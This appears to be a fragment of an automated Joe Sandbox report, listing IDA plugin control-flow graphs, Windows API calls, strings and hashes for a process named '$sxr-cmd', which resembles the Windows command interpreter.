                                                                                                              • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
                                                                                                              • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
                                                                                                              • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
                                                                                                              • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
                                                                                                              • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$HeapMode_get_osfhandle$QueryValue$AddressHandleProcProcess$AllocCommandCriticalFreeInfoLineLockSectionShared$AcquireAllocateBufferCtrlDirectoryEnterEnvironmentFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenStringsTitleTypeWindowsmemmove
                                                                                                            • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                            • API String ID: 2533808960-3021193919
                                                                                                            • Opcode ID: e06c67148f7922823ef8cc05bd360387e5fff113248df6310448dc3bfb3b53b3
                                                                                                            • Instruction ID: 3f0fb2f69f1c4e73f8b0c247fbec0343185749a4620a871c2bfad394c9c4f576
                                                                                                            • Opcode Fuzzy Hash: e06c67148f7922823ef8cc05bd360387e5fff113248df6310448dc3bfb3b53b3
                                                                                                            • Instruction Fuzzy Hash: 6CC15D61A08E42DAEB84BB11E8401B9E7A4FF89BB0FC48134D91E27791DF7DE55D8230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 731 7ff7137f3c24-7ff7137f3c61 732 7ff7137fec5a-7ff7137fec5f 731->732 733 7ff7137f3c67-7ff7137f3c99 call 7ff7137eaf14 call 7ff7137eca40 731->733 732->733 735 7ff7137fec65-7ff7137fec6a 732->735 742 7ff7137f3c9f-7ff7137f3cb2 call 7ff7137eb900 733->742 743 7ff7137fec97-7ff7137feca1 call 7ff7137f855c 733->743 737 7ff7137f412e-7ff7137f415b call 7ff7137f8f80 735->737 742->743 748 7ff7137f3cb8-7ff7137f3cbc 742->748 749 7ff7137f3cbf-7ff7137f3cc7 748->749 749->749 750 7ff7137f3cc9-7ff7137f3ccd 749->750 751 7ff7137f3cd2-7ff7137f3cd8 750->751 752 7ff7137f3ce5-7ff7137f3d62 GetCurrentDirectoryW towupper iswalpha 751->752 753 7ff7137f3cda-7ff7137f3cdf 751->753 755 7ff7137f3fb8 752->755 756 7ff7137f3d68-7ff7137f3d6c 752->756 753->752 754 7ff7137f3faa-7ff7137f3fb3 753->754 754->751 758 7ff7137f3fc6-7ff7137f3fec GetLastError call 7ff7137f855c call 7ff7137fa5d6 755->758 756->755 757 7ff7137f3d72-7ff7137f3dcd towupper GetFullPathNameW 756->757 757->758 759 7ff7137f3dd3-7ff7137f3ddd 757->759 762 7ff7137f3ff1-7ff7137f4007 call 7ff7137f855c _local_unwind 758->762 761 7ff7137f3de3-7ff7137f3dfb 759->761 759->762 764 7ff7137f3e01-7ff7137f3e11 761->764 765 7ff7137f40fe-7ff7137f4119 call 7ff7137f855c _local_unwind 761->765 773 7ff7137f400c-7ff7137f4022 GetLastError 762->773 764->765 769 7ff7137f3e17-7ff7137f3e28 764->769 776 7ff7137f411a-7ff7137f4127 call 7ff7137eff70 call 7ff7137f855c 765->776 772 7ff7137f3e2c-7ff7137f3e34 769->772 772->772 777 7ff7137f3e36-7ff7137f3e3f 772->777 774 7ff7137f3e95-7ff7137f3e9c 773->774 775 7ff7137f4028-7ff7137f402b 773->775 780 7ff7137f3ecf-7ff7137f3ed3 774->780 781 7ff7137f3e9e-7ff7137f3ec2 call 7ff7137f2978 774->781 775->774 779 7ff7137f4031-7ff7137f4047 call 7ff7137f855c _local_unwind 775->779 801 7ff7137f412c 776->801 778 7ff7137f3e42-7ff7137f3e55 777->778 783 7ff7137f3e66-7ff7137f3e8f GetFileAttributesW 778->783 784 7ff7137f3e57-7ff7137f3e60 778->784 798 7ff7137f404c-7ff7137f4062 call 7ff7137f855c _local_unwind 779->798 787 7ff7137f3ed5-7ff7137f3ef7 GetFileAttributesW 780->787 788 7ff7137f3f08-7ff7137f3f0b 780->788 792 7ff7137f3ec7-7ff7137f3ec9 781->792 783->773 783->774 784->783 790 7ff7137f3f9d-7ff7137f3fa5 784->790 793 7ff7137f3efd-7ff7137f3f02 787->793 794 7ff7137f4067-7ff7137f4098 GetLastError call 7ff7137f855c _local_unwind 787->794 796 7ff7137f3f0d-7ff7137f3f11 788->796 797 7ff7137f3f1e-7ff7137f3f40 SetCurrentDirectoryW 788->797 790->778 792->780 792->798 793->788 800 7ff7137f409d-7ff7137f40b3 call 7ff7137f855c _local_unwind 793->800 794->800 802 7ff7137f3f46-7ff7137f3f62 call 7ff7137f498c 796->802 803 7ff7137f3f13-7ff7137f3f1c 796->803 797->802 804 7ff7137f40b8-7ff7137f40de GetLastError call 7ff7137f855c _local_unwind 797->804 798->794 800->804 801->737 810 7ff7137f3f67-7ff7137f3f69 802->810 803->797 803->802 814 7ff7137f40e3-7ff7137f40f9 call 7ff7137f855c _local_unwind 804->814 810->814 815 7ff7137f3f6f-7ff7137f3f98 call 7ff7137f417c 810->815 814->765 815->776
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                            • String ID: :
                                                                                                            • API String ID: 1809961153-336475711
                                                                                                            • Opcode ID: 9d74a12bc874b56384ee2849c9ea8ed33252762c4bf133df5b2631275a7736a1
                                                                                                            • Instruction ID: 31c86a57a4236d89e88fd78f693953c1471ae9b321943a3f05e3e80dc6d7ddab
                                                                                                            • Opcode Fuzzy Hash: 9d74a12bc874b56384ee2849c9ea8ed33252762c4bf133df5b2631275a7736a1
                                                                                                            • Instruction Fuzzy Hash: D8D15F2260CF8592EBA0AB15E4842B9F7A5FB88760F844235E95E537A4DF3CE54CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 913 7ff7137f2394-7ff7137f2416 memset call 7ff7137eca40 916 7ff7137fe0d2-7ff7137fe0da call 7ff7137f4c1c 913->916 917 7ff7137f241c-7ff7137f2453 GetModuleFileNameW call 7ff7137f081c 913->917 922 7ff7137fe0db-7ff7137fe0ee call 7ff7137f498c 916->922 917->922 923 7ff7137f2459-7ff7137f2468 call 7ff7137f081c 917->923 928 7ff7137fe0f4-7ff7137fe107 call 7ff7137f498c 922->928 923->928 929 7ff7137f246e-7ff7137f247d call 7ff7137f081c 923->929 938 7ff7137fe10d-7ff7137fe123 928->938 934 7ff7137f2516-7ff7137f2524 call 7ff7137f498c 929->934 935 7ff7137f2483-7ff7137f2492 call 7ff7137f081c 929->935 941 7ff7137f2529 934->941 935->938 946 7ff7137f2498-7ff7137f24a7 call 7ff7137f081c 935->946 939 7ff7137fe125-7ff7137fe139 wcschr 938->939 940 7ff7137fe13f-7ff7137fe17a _wcsupr 938->940 939->940 943 7ff7137fe27c 939->943 944 7ff7137fe181-7ff7137fe199 wcsrchr 940->944 945 7ff7137fe17c-7ff7137fe17f 940->945 941->935 948 7ff7137fe283-7ff7137fe29b call 7ff7137f498c 943->948 947 7ff7137fe19c 944->947 945->947 955 7ff7137fe2a1-7ff7137fe2c3 _wcsicmp 946->955 956 7ff7137f24ad-7ff7137f24db call 7ff7137f3c24 946->956 950 7ff7137fe1a0-7ff7137fe1a7 947->950 948->955 950->950 953 7ff7137fe1a9-7ff7137fe1bb 950->953 957 7ff7137fe264-7ff7137fe277 call 7ff7137f1300 953->957 958 7ff7137fe1c1-7ff7137fe1e6 953->958 966 7ff7137f24dd-7ff7137f24e4 free 956->966 967 7ff7137f24e9-7ff7137f2514 call 7ff7137f8f80 956->967 957->943 961 7ff7137fe21a 958->961 962 7ff7137fe1e8-7ff7137fe1f1 958->962 968 7ff7137fe21d-7ff7137fe21f 961->968 964 7ff7137fe1f3-7ff7137fe1f6 962->964 965 7ff7137fe201-7ff7137fe210 962->965 964->965 969 7ff7137fe1f8-7ff7137fe1ff 964->969 965->961 970 7ff7137fe212-7ff7137fe218 965->970 966->967 968->948 972 7ff7137fe221-7ff7137fe228 968->972 969->964 969->965 970->968 974 7ff7137fe254-7ff7137fe262 972->974 975 7ff7137fe22a-7ff7137fe231 972->975 974->943 976 7ff7137fe234-7ff7137fe237 975->976 976->974 977 7ff7137fe239-7ff7137fe242 976->977 977->974 978 7ff7137fe244-7ff7137fe252 977->978 978->974 978->976
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprfreewcschr
                                                                                                            • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                            • API String ID: 318233705-4197029667
                                                                                                            • Opcode ID: aa9ea99ae18befcdff354521521d3befe7903b525e5394531d6d563bbc5abe5f
                                                                                                            • Instruction ID: 961f06866075b2b1a04b8f057930b6596c35e57130b8e5121036d0759c48a79e
                                                                                                            • Opcode Fuzzy Hash: aa9ea99ae18befcdff354521521d3befe7903b525e5394531d6d563bbc5abe5f
                                                                                                            • Instruction Fuzzy Hash: 79919161B09E8285EFA4AB10D8901F8A3A4FF48BA4FC44535C91E67794EF3DE51CC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleMode_get_osfhandle
                                                                                                            • String ID: CMD.EXE
                                                                                                            • API String ID: 1606018815-3025314500
                                                                                                            • Opcode ID: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
                                                                                                            • Instruction ID: d6394d3c4d3499a8b2829560184a96dda8aa5e7f805f25193b00f20e82d44886
                                                                                                            • Opcode Fuzzy Hash: 3e686ae0276ad7ff8a78bb3c5d2715100bc0f58041da1ae85f5dc5c67167e71d
                                                                                                            • Instruction Fuzzy Hash: 9A41FC35A19F028BE7856B15E884578FAA0BB8AB71FD48134C91E63360DF7EA41CC630
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 991 7ff7137ec620-7ff7137ec66f GetConsoleTitleW 992 7ff7137ec675-7ff7137ec687 call 7ff7137eaf14 991->992 993 7ff7137fc5f2 991->993 998 7ff7137ec68e-7ff7137ec69d call 7ff7137eca40 992->998 999 7ff7137ec689 992->999 995 7ff7137fc5fc-7ff7137fc60c GetLastError 993->995 997 7ff7137fc5e3 call 7ff7137e3278 995->997 1003 7ff7137fc5e8-7ff7137fc5ed call 7ff7137f855c 997->1003 998->1003 1004 7ff7137ec6a3-7ff7137ec6ac 998->1004 999->998 1003->993 1006 7ff7137ec954-7ff7137ec95e call 7ff7137f291c 1004->1006 1007 7ff7137ec6b2-7ff7137ec6c5 call 7ff7137eb9c0 1004->1007 1014 7ff7137ec964-7ff7137ec96b call 7ff7137e89c0 1006->1014 1015 7ff7137fc5de-7ff7137fc5e0 1006->1015 1012 7ff7137ec9b5-7ff7137ec9b8 call 7ff7137f5c6c 1007->1012 1013 7ff7137ec6cb-7ff7137ec6ce 1007->1013 1021 7ff7137ec9bd-7ff7137ec9c9 call 7ff7137f855c 1012->1021 1013->1003 1016 7ff7137ec6d4-7ff7137ec6e9 1013->1016 1022 7ff7137ec970-7ff7137ec972 1014->1022 1015->997 1019 7ff7137fc616-7ff7137fc620 call 7ff7137f855c 1016->1019 1020 7ff7137ec6ef-7ff7137ec6fa 1016->1020 1025 7ff7137fc627 1019->1025 1024 7ff7137ec700-7ff7137ec713 1020->1024 1020->1025 1038 7ff7137ec9d0-7ff7137ec9d7 1021->1038 1022->995 1023 7ff7137ec978-7ff7137ec99a towupper 1022->1023 1028 7ff7137ec9a0-7ff7137ec9a9 1023->1028 1029 7ff7137fc631 1024->1029 1030 7ff7137ec719-7ff7137ec72c 1024->1030 1025->1029 1028->1028 1033 7ff7137ec9ab-7ff7137ec9af 1028->1033 1035 7ff7137fc63b 1029->1035 1034 7ff7137ec732-7ff7137ec747 call 7ff7137ed3f0 1030->1034 1030->1035 1033->1012 1036 7ff7137fc60e-7ff7137fc611 call 7ff71380ec14 1033->1036 1044 7ff7137ec74d-7ff7137ec750 1034->1044 1045 7ff7137ec8ac-7ff7137ec8af 1034->1045 1043 7ff7137fc645 1035->1043 1036->1019 1041 7ff7137ec872-7ff7137ec8aa call 7ff7137f855c call 7ff7137f8f80 1038->1041 1042 7ff7137ec9dd-7ff7137fc6da SetConsoleTitleW 1038->1042 1042->1041 1052 7ff7137fc64e-7ff7137fc651 1043->1052 1048 7ff7137ec752-7ff7137ec764 call 7ff7137ebd38 1044->1048 1049 7ff7137ec76a-7ff7137ec76d 1044->1049 1045->1044 1051 7ff7137ec8b5-7ff7137ec8d3 wcsncmp 1045->1051 1048->1003 1048->1049 1057 7ff7137ec773-7ff7137ec77a 1049->1057 1058 7ff7137ec840-7ff7137ec84b call 7ff7137ecb40 1049->1058 1051->1049 1059 7ff7137ec8d9 1051->1059 1053 7ff7137ec80d-7ff7137ec811 1052->1053 1054 7ff7137fc657-7ff7137fc65b 1052->1054 1061 7ff7137ec9e2-7ff7137ec9e7 1053->1061 1062 7ff7137ec817-7ff7137ec81b 1053->1062 1054->1053 1065 7ff7137ec780-7ff7137ec784 1057->1065 1074 7ff7137ec856-7ff7137ec86c 1058->1074 1075 7ff7137ec84d-7ff7137ec855 call 7ff7137ecad4 1058->1075 1059->1044 1061->1062 1069 7ff7137ec9ed-7ff7137ec9f7 call 7ff7137f291c 1061->1069 1067 7ff7137ec821 1062->1067 1068 7ff7137eca1b-7ff7137eca1f 1062->1068 1070 7ff7137ec83d 1065->1070 1071 7ff7137ec78a-7ff7137ec7a4 wcschr 1065->1071 1077 7ff7137ec824-7ff7137ec82d 1067->1077 1068->1067 1076 7ff7137eca25-7ff7137fc6b3 call 7ff7137e3278 1068->1076 1090 7ff7137fc684-7ff7137fc698 call 7ff7137e3278 1069->1090 1091 7ff7137ec9fd-7ff7137eca00 1069->1091 1070->1058 1072 7ff7137ec8de-7ff7137ec8f7 1071->1072 1073 7ff7137ec7aa-7ff7137ec7ad 1071->1073 1079 7ff7137ec900-7ff7137ec908 1072->1079 1080 7ff7137ec7b0-7ff7137ec7b8 1073->1080 1074->1038 1074->1041 1075->1074 1076->1003 1077->1077 1083 7ff7137ec82f-7ff7137ec837 1077->1083 1079->1079 1085 7ff7137ec90a-7ff7137ec915 1079->1085 1080->1080 1086 7ff7137ec7ba-7ff7137ec7c7 1080->1086 1083->1065 1083->1070 1093 7ff7137ec93a-7ff7137ec944 1085->1093 1094 7ff7137ec917 1085->1094 1086->1052 1095 7ff7137ec7cd-7ff7137ec7db 1086->1095 1090->1003 1091->1062 1092 7ff7137eca06-7ff7137eca10 call 7ff7137e89c0 1091->1092 1092->1062 1110 7ff7137eca16-7ff7137fc67f GetLastError call 7ff7137e3278 1092->1110 1102 7ff7137eca2a-7ff7137eca2f call 7ff7137f9158 1093->1102 1103 7ff7137ec94a 1093->1103 1099 7ff7137ec920-7ff7137ec928 1094->1099 1100 7ff7137ec7e0-7ff7137ec7e7 1095->1100 1105 7ff7137ec932-7ff7137ec938 1099->1105 1106 7ff7137ec92a-7ff7137ec92f 1099->1106 1107 7ff7137ec800-7ff7137ec803 1100->1107 1108 7ff7137ec7e9-7ff7137ec7f1 1100->1108 1102->1015 1103->1006 1105->1093 1105->1099 1106->1105 1107->1043 1112 7ff7137ec809 1107->1112 1108->1107 1111 7ff7137ec7f3-7ff7137ec7fe 1108->1111 1110->1003 1111->1100 1111->1107 1112->1053
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleTitlewcschr
                                                                                                            • String ID: /$:$C:\Windows
                                                                                                            • API String ID: 2364928044-2365244837
                                                                                                            • Opcode ID: 3ce203a2d681a677f138c339ca1d64b501cdeb8a980a49a03dd7b8658ec4f088
                                                                                                            • Instruction ID: 3e0cd4211b5a116c3444cef5c9c4730b2630e87cc812026accceb59f3a26f642
                                                                                                            • Opcode Fuzzy Hash: 3ce203a2d681a677f138c339ca1d64b501cdeb8a980a49a03dd7b8658ec4f088
                                                                                                            • Instruction Fuzzy Hash: 47C18C65A08A4381FFA4BB1594842B9E2A5BF48BA0FC44231D96E772D5DF3CE84CD320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1170 7ff7137f8d80-7ff7137f8da2 1171 7ff7137f8da4-7ff7137f8daf 1170->1171 1172 7ff7137f8db1-7ff7137f8db4 1171->1172 1173 7ff7137f8dcc 1171->1173 1174 7ff7137f8db6-7ff7137f8dbd 1172->1174 1175 7ff7137f8dbf-7ff7137f8dca Sleep 1172->1175 1176 7ff7137f8dd1-7ff7137f8dd9 1173->1176 1174->1176 1175->1171 1177 7ff7137f8ddb-7ff7137f8de5 _amsg_exit 1176->1177 1178 7ff7137f8de7-7ff7137f8def 1176->1178 1179 7ff7137f8e4c-7ff7137f8e54 1177->1179 1180 7ff7137f8e46 1178->1180 1181 7ff7137f8df1-7ff7137f8e0a 1178->1181 1182 7ff7137f8e56-7ff7137f8e69 _initterm 1179->1182 1183 7ff7137f8e73-7ff7137f8e75 1179->1183 1180->1179 1184 7ff7137f8e0e-7ff7137f8e11 1181->1184 1182->1183 1185 7ff7137f8e80-7ff7137f8e88 1183->1185 1186 7ff7137f8e77-7ff7137f8e79 1183->1186 1187 7ff7137f8e13-7ff7137f8e15 1184->1187 1188 7ff7137f8e38-7ff7137f8e3a 1184->1188 1190 7ff7137f8eb4-7ff7137f8ec8 call 7ff7137f37d8 1185->1190 1191 7ff7137f8e8a-7ff7137f8e98 call 7ff7137f94f0 1185->1191 1186->1185 1189 7ff7137f8e3c-7ff7137f8e41 1187->1189 1192 7ff7137f8e17-7ff7137f8e1b 1187->1192 1188->1179 1188->1189 1193 7ff7137f8f28-7ff7137f8f3d 1189->1193 1199 7ff7137f8ecd-7ff7137f8eda 1190->1199 1191->1190 1202 7ff7137f8e9a-7ff7137f8eaa 1191->1202 1195 7ff7137f8e2d-7ff7137f8e36 1192->1195 1196 7ff7137f8e1d-7ff7137f8e29 1192->1196 1195->1184 1196->1195 1200 7ff7137f8ee4-7ff7137f8eeb 1199->1200 1201 7ff7137f8edc-7ff7137f8ede exit 1199->1201 1204 7ff7137f8eed-7ff7137f8ef3 _cexit 1200->1204 1205 7ff7137f8ef9 1200->1205 1201->1200 1202->1190 1204->1205 1205->1193
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 4291973834-0
                                                                                                            • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                            • Instruction ID: 72056998dfaa14b9796beeaca08af1dd2930cd545ecfb3a6fd037ef02c3ff025
                                                                                                            • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                            • Instruction Fuzzy Hash: 4341DB21A18E2399FBD0BF10E980335E6A4BF58764F840435D92D676A0DFBDE85C8771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1206 7ff7137e89c0-7ff7137e8a3d memset call 7ff7137eca40 1209 7ff7137e8a43-7ff7137e8a71 GetDriveTypeW 1206->1209 1210 7ff7137e8ace-7ff7137e8adf 1206->1210 1213 7ff7137fb411-7ff7137fb422 1209->1213 1214 7ff7137e8a77-7ff7137e8a7a 1209->1214 1211 7ff7137e8ae1-7ff7137e8ae8 ??_V@YAXPEAX@Z 1210->1211 1212 7ff7137e8aed 1210->1212 1211->1212 1216 7ff7137e8aef-7ff7137e8b16 call 7ff7137f8f80 1212->1216 1217 7ff7137fb424-7ff7137fb42b ??_V@YAXPEAX@Z 1213->1217 1218 7ff7137fb430-7ff7137fb435 1213->1218 1214->1210 1215 7ff7137e8a7c-7ff7137e8a7f 1214->1215 1215->1210 1219 7ff7137e8a81-7ff7137e8ac8 GetVolumeInformationW 1215->1219 1217->1218 1218->1216 1219->1210 1221 7ff7137fb3fc-7ff7137fb40b GetLastError 1219->1221 1221->1210 1221->1213
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
